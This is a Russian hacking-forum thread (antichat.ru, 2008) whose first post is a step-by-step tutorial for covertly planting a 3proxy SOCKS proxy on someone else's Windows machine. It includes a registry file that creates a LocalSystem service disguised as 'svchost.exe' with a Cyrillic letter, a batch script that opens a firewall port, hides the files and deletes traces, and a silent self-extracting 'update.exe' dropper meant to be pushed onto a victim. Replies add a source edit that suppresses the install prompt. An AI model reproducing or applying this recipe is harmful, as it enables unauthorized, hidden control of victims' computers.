Статьи Автозагрузка 3proxy и др. через службы

Discussion in 'Статьи' started by .dimoN., 17 Jul 2008.

  1. .dimoN.

    .dimoN. Elder - Старейшина

    Joined:
    8 Apr 2008
    Messages:
    76
    Likes Received:
    56
    Reputations:
    5
    Вобщем это моя первая статья и т.к. сам я новичок, то ничего особенного тут не будет.
    Получив доступ к одному компу чайника в локалке мне захотелось поставить на нем прокси. Но как это сделать незаметно? Вот об этом я и расскажу. В сети полно различных прокси серверов, но мне был необходим максимально незаметный. Мой выбор остановился на 3proxy, т.к. все его настройки хранятся в отдельном файле, нет никаких значков в трее, возможность работы как служба. 3proxy поддерживает HTTP, SOCKSv4/SOCKSv4.5/SOCKSv5, FTP proxy и многое другое. Обо всех возможностях можете прочитать на 3proxy.ru

    Сейчас большинство пользователей знают что многие программы прописывают себя в реестр для автозагрузки и периодически проверяют это с помощью msconfig или других программ, но на службы обращают внимание очень редко. Некоторые даже о них ничего не слышали… Немного о службах http://ru.wikipedia.org/wiki/Службы_Windows

    Теперь качаем 3proxy тут. Наш прокси в папке bin.
    Установить как службу можно так
    C:\Program Files\3proxy\3proxy.exe --install C:\Program Files\3proxy\3proxy.cfg
    Но при этом выскакивает запрос с подтверждением
    [​IMG]
    Поэтому такой вариант нам совсем не подходит и мы будем создавать службу вручную.
    Все настройки служб хранятся в реестре HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services.

    Параметры, которые необходимы для работы службы:
    Description - описание службы
    DisplayName - имя службы, отбражаемое в списке всех служб
    ErrorControl - критичность ошибок службы для работы системы. Обычно устанавливают 0
    ImagePath - путь к исполняемому файлу
    ObjectName - имя пользователя, от которого будет запущена служба. Ставим LocalSystem чтоб запускать с правами system
    Start - тип запуска. Для запуска при старте системы ставим 2.
    Type - тип службы. Этот параметр отличает службы от драйверов. Здесь надо поставить значение 16 (десятичная)

    Маскировка.
    Переименовываем 3proxy.exe в svсhost.exe, НО букву с пишем русскую для того чтобы закинуть в system32. Файл конфигурации назовем например comand.drv Кстати о файле конфигурации, моей целью было поднять socks, поэтому пишем в нем следующее:
    Code:
    [B]auth none
    socks -p2323[/B]
    Это значит что наш сокс не требует авторизации и будет работать на 2323 порту.
    Составим reg-файл, записав туда все настройки нашей службы, причем нужно придумать параметры Description и DisplayName, а также название службы, которые не будут вызывать подозрений. У меня она будет называться Net client
    Code:
    [B]Windows Registry Editor Version 5.00
    
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Net client]
    "Description"="Обеспечивает компьютеру доступ к сети TCP/IP"
    "DisplayName"="Доступ к сети TCP/IP"
    "ErrorControl"=dword:00000000
    "ImagePath"="C:\\WINDOWS\\system32\\svсhost.exe C:\\WINDOWS\\system32\\comand.drv --service"
    "ObjectName"="LocalSystem"
    "Start"=dword:00000002
    "Type"=dword:00000010[/B]
    
    "ImagePath"="C:\\WINDOWS\\system32\\svсhost.exe C:\\WINDOWS\\system32\\comand.drv --service" В svchost буква с русская. Как видим тут указывается не только где расположен наш исполняемый файл, но и файл конфигурации и опция --service. Для каждой программы могут быть индивидуальные настройки, узнать можно либо из справки, либо установить себе и посмотреть ;)

    Теперь напишем bat файл для невидимой установки нашей службы.
    Code:
    [B]chcp 1251
    netsh firewall add portopening TCP 2323 system
    attrib +r +h +s C:\Windows\system32\svсhost.exe
    attrib +r +h +s C:\Windows\system32\comand.drv
    reg import st.reg
    regedit /s st.reg
    del "%userprofile%\Рабочий стол\update.exe" /f
    del "%userprofile%\Мои документы\update.exe" /f
    del "%userprofile%\Application Data\Microsoft\Internet Explorer\Quick Launch\update.exe" /f
    del "%userprofile%\Главное меню\Программы\Автозагрузка\update.exe" /f
    del C:\update.exe /f
    del D:\update.exe /f
    del E:\update.exe /f
    del %SystemRoot%\system32\st.reg /f
    del %SystemRoot%\system32\st.exe /f[/B]
    //не забываем про svchost, буква с русская
    Этот батник добавляет правило в фаерволл windows и разрешает соединение для порта 2323, устанавливает на файл svchost и comand.drv атрибуты скрытый, системный и только для чтения, импортирует настройки нашей службы. Остальные команды для удаления нашего будущего sfx архива, просто добавил под разлчные случаи. Если вы внимательно посмотрели на батник, то заметили что в последней команде есть файл st.exe, о котором я ничего не писал. Это и есть наш батник =] Все знают что когда батник срабатывает, то видно черное окно командной строки, которое вызывает много подозрений. Есть способ его спрятать. Для этого нам понадобится программа Quick Batch File Compiler (можете скачать тут ) Эта программа предназначена для преобразования bat в exe, а также есть офигенная функция – скрывать этот долбанный квадрат Малевича. Жмем option и выбираем Ghost application, затем заносим содержимое батника в прогу, жмем Build и сохраняем под именем st.exe
    Все практически готово, осталось только собрать это в одну кучу. Берем наш svchost.exe, command.drv, st.reg, st.exe и все остальные файлы из папки bin, жмем добавить в архив, выбираем бес сжатия (для того чтоб быстрее сработал, хотя кому как нравится), отмечаем sfx архив, имя архива update.exe, затем переходим во вкладку дополнительно/параметры sfx. На вкладке Общие указываем путь для распаковки C:\WINDOWS\system32, в поле “Выполнить после распаковки” пишем C:\WINDOWS\system32\st.exe Теперь переходим в вкладку Режимы и отмечаем “Скрывать все” и “Пропускать существующие файлы”, жмем ок. Осталось только впарить наш файл жертве или если есть доступ к диску С закинуть в папку автозагрузка (в этом случае прокси заработает через две перезагрузки, автоматически удалив update.exe из папки автозагрузка).
    Этот способ можно использовать для любой программы, которая умеет работать как служба (например радмин - https://forum.antichat.ru/thread13658.html и Telnet - https://forum.antichat.ru/thread68300.html )

    Я решил проверить, что будет если подсунуть в качестве службы обычную прогу, например калькулятор :) При загрузке он запускается, но его не видно на экране. Затем винда через секнд 10-15 его отключает. Этого времени достаточно чтобы запустить например трой, но работает калькулятор или нет я так и не понял. Может он просто завис… Я снова открыл Quick Batch File Compiler и написал такой батник
    Code:
    echo Segodnya %date%:%time%>>c:\otchet.txt 
    При каждом запуске в файл будет дописываться строка с датой и временем. Подсунув такую прогу в качестве службы все сработало нормально, при каждой перезагрузке в файл добавлялась новая строка, значит службы можно использовать и для запуска троянов.
    ===================================
    UPD: исправил кавычки, добавил видео. Скачать можно тут или тут
    pass: antichat.ru
     
    #1 .dimoN., 17 Jul 2008
    Last edited: 27 Feb 2009
    27 people like this.
  2. vvs777

    vvs777 Elder - Старейшина

    Joined:
    16 Nov 2004
    Messages:
    394
    Likes Received:
    213
    Reputations:
    4
    Хороший ликбез по установке служб...
    +2
    Я тож такой фигней одно время в локале страдал. Только другой сокс навешивал. И джоинить приходилось. правда над фаером не стебался =)
     
  3. brain-m

    brain-m New Member

    Joined:
    4 Dec 2007
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    В 3proxy-0.6-devel и 3proxy-0.5.3k отсутствует аргумент "--service". Справка выдаёт:
    C:\3proxy --service
    Usage: 3proxy [conffile]

    3proxy --install [conffile]
    to install as service

    3proxy --remove
    to remove service

    3proxy tiny proxy server 3proxy-0.6b-devel (080826163128)
    (c)2000-2007 3APA3A, Vladimir Dubrovin & 3proxy.ru
    Documentation and sources: http://3proxy.ru/
    Please read license agreement in 'copying' file.
    You may not use this program without accepting license agreement

    В чём может быть проблема?
     
  4. .dimoN.

    .dimoN. Elder - Старейшина

    Joined:
    8 Apr 2008
    Messages:
    76
    Likes Received:
    56
    Reputations:
    5
    Читай внимательней
    C:\Program Files\3proxy\3proxy.exe --install C:\Program Files\3proxy\3proxy.cfg
     
    1 person likes this.
  5. brain-m

    brain-m New Member

    Joined:
    4 Dec 2007
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Да, но в реестр в службы пишется: "ImagePath"=”C:\\WINDOWS\\system32\\svсhost.exe C:\\WINDOWS\\system32\\comand.drv --service

    Вот ещё такой вопрос: Ведь если у нас сам сервер ложится в каталог system32, то можно записать в реестр не абсолютный путь, а локальный. т.е. не "C:\\WINDOWS\\system32\\svсhost.exe" а просто "svсhost.exe" или нельзя? и соответственно можно ли писать не "C:\\WINDOWS\\system32\\comand.drv", а "comand.drv"??
     
  6. n0153r

    n0153r Elder - Старейшина

    Joined:
    19 Jun 2007
    Messages:
    260
    Likes Received:
    92
    Reputations:
    11
    =) Хорошый мануал по 3прокси. почерпнул для себя немного.
    По работе с лужбами интересненько.
     
    2 people like this.
  7. FrMn

    FrMn Elder - Старейшина

    Joined:
    8 Aug 2008
    Messages:
    51
    Likes Received:
    16
    Reputations:
    7
    не у всех винда на c:, не у всех в папке windows.
     
  8. brain-m

    brain-m New Member

    Joined:
    4 Dec 2007
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    вот, а алгоритм и последовательность поиска требуемых файлов один:
    1. Текущий каталог
    2. Папка system32
    3. Папка windows
    если мне не изменят память. Так что всё должно работать и с относительными путями.

    Кто-нибудь напишет результат выполнения у себя ”C:\\WINDOWS\\system32\\svсhost.exe C:\\WINDOWS\\system32\\comand.drv --service” или эквивалентов в вашем случае. У меня 3proxy идёт в отказ и говорит, что не понимает о чём я: о каком "--service"?
     
  9. m-Xacker

    m-Xacker Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    111
    Likes Received:
    10
    Reputations:
    0
    Спасибо за прокси но её нужно дорабатывать, потому что в реестр нужно добавлять путь кодировке

    "ImagePath"=hex(2):22,00,43,00,3a,00,5c,00,57,00,49,00,4e,00,44,00,4f,00,57,00,\
    53,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,00,79,\
    00,73,00,74,00,65,00,6d,00,33,00,32,00,2e,00,65,00,78,00,65,00,22,00,20,00,\
    22,00,43,00,3a,00,5c,00,57,00,49,00,4e,00,44,00,4f,00,57,00,53,00,5c,00,73,\
    00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,63,00,6f,00,6d,00,61,00,\
    6e,00,64,00,2e,00,64,00,72,00,76,00,22,00,20,00,2d,00,2d,00,73,00,65,00,72,\
    00,76,00,69,00,63,00,65,00,00,00

    а так просто он не добавляеться C:\\WINDOWS\\system32\\svсhost.exe C:\\WINDOWS\\system32\\comand.drv --service”

    Ps почти у все стоит виндовс на диске С))
     
  10. t4Nk

    t4Nk Elder - Старейшина

    Joined:
    23 Sep 2007
    Messages:
    70
    Likes Received:
    33
    Reputations:
    0
    а я исправлял исходники, чтоб не выводило запрос на установку :d
    зы
    C:\\windows можно заменить на %windir% чтоб универсальнее было ;)
     
  11. schwarze

    schwarze Member

    Joined:
    1 Dec 2008
    Messages:
    64
    Likes Received:
    38
    Reputations:
    5
    Молодец что исправил, может поделишься?
     
  12. zeonx

    zeonx Banned

    Joined:
    8 Dec 2008
    Messages:
    27
    Likes Received:
    6
    Reputations:
    0
    Пробовал делать все как сказано в статье ничего не работает, может кто подскажет, как надо делать, в Imagepath= кавычки нужны к путям?(или это неважно?), вообще как запустить на своем компе? что в статье неправильно? скажите люди добрые за репу..
     
  13. satana8920

    satana8920 Палач Античата

    Joined:
    22 Sep 2006
    Messages:
    396
    Likes Received:
    138
    Reputations:
    6
    ненаю статья не понравилась потому что ну чем она от мана отличаться на офф сайте тем что ты перевел на руский?
     
    1 person likes this.
  14. t4Nk

    t4Nk Elder - Старейшина

    Joined:
    23 Sep 2007
    Messages:
    70
    Likes Received:
    33
    Reputations:
    0
    чтобы при установке как службы не выводило окошко с запросом - комментируем в файле 3proxy.c
    1791 строку для 3proxy 0.6-dev
    Code:
    //if(MessageBox(NULL, (char *)tmpbuf, stringtable[2], MB_YESNO|MB_ICONASTERISK) != IDYES) return 1;
    
    или 1555 для 3proxy-0.5.3k
    Code:
    //if(MessageBox(NULL, (char *)tmpbuf, conf.stringtable[2], MB_YESNO|MB_ICONASTERISK) != IDYES) return 1;
    
    потом собираем и устанавливаем ;)
     
    1 person likes this.
  15. WALKMAN

    WALKMAN Elder - Старейшина

    Joined:
    30 Dec 2007
    Messages:
    61
    Likes Received:
    2
    Reputations:
    0
    Вот собственно тут я и застрял, скачал исходники 3proxy-0.6-deve, нашел 3proxy.c , нашел строку, закоментировал ее, при компиляции 3proxy.с получил множественные ошибки.
    Собственно как всю ету програмулину собрать до кучи? Как откомпилировать? :confused:
     
  16. $ereg@

    $ereg@ Elder - Старейшина

    Joined:
    21 Aug 2008
    Messages:
    91
    Likes Received:
    4
    Reputations:
    0
    выложите ктонить эту вещь в собранном виде пж :)
     
  17. $ereg@

    $ereg@ Elder - Старейшина

    Joined:
    21 Aug 2008
    Messages:
    91
    Likes Received:
    4
    Reputations:
    0
    "ImagePath"=”C:\\WINDOWS\\system32\\svсhost.exe C:\\WINDOWS\\system32\\comand.drv --service”
    помоему ковычки не правильные, так путь до файла не пропишеться ...
     
  18. .dimoN.

    .dimoN. Elder - Старейшина

    Joined:
    8 Apr 2008
    Messages:
    76
    Likes Received:
    56
    Reputations:
    5
    да, тут должны быть обычные кавычки. завтра добавлю видео
     
  19. $ereg@

    $ereg@ Elder - Старейшина

    Joined:
    21 Aug 2008
    Messages:
    91
    Likes Received:
    4
    Reputations:
    0
    а у меня из-за этих ковычек не получалось всё вместе собрать. всё прально делал, потом редактор реестра открываю, а там пути к серверу нет... ну а потом эти ковычки заметил) вопщем у меня всётаки получилос собрать эту вещь :D
     
    1 person likes this.
  20. .dimoN.

    .dimoN. Elder - Старейшина

    Joined:
    8 Apr 2008
    Messages:
    76
    Likes Received:
    56
    Reputations:
    5
    видео в 1 посте